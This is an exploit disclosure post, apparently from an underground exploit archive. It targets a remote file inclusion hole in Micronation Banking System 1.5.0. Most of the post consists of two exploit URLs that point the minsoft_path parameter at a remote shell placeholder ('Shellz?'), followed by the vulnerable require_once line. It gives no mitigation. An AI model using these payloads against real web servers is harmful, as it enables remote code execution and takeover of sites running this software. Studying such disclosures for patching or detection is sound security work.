************************************************************************************** Author : By DaRkLiFe Greetz : str0ke & S.VV.A.T. ************************************************************************************** Script : Micronation Banking System(minba) 1.5.0 Remote File Inclusion Vulnerability(s) Download: http://downloads.sourceforge.net/minbank/minba_v0150.zip?modtime=1169500084&big_mirror=0 ************************************************************************************** Exploit : http://site.com/minba/utility/utdb_access.php?minsoft_path=Shellz? http://site.com/minba/utility/utgn_message.php?minsoft_path=Shellz? ************************************************************************************** In Multiple files the vulnerability exists. I have posted two examples Vulberable : line 3 : require_once("$minsoft_path/utility/utgn_config.php"); in minba/utility/utgn_message.php file ************************************************************************************** THANKS ! GREETZ ! **************************************************************************************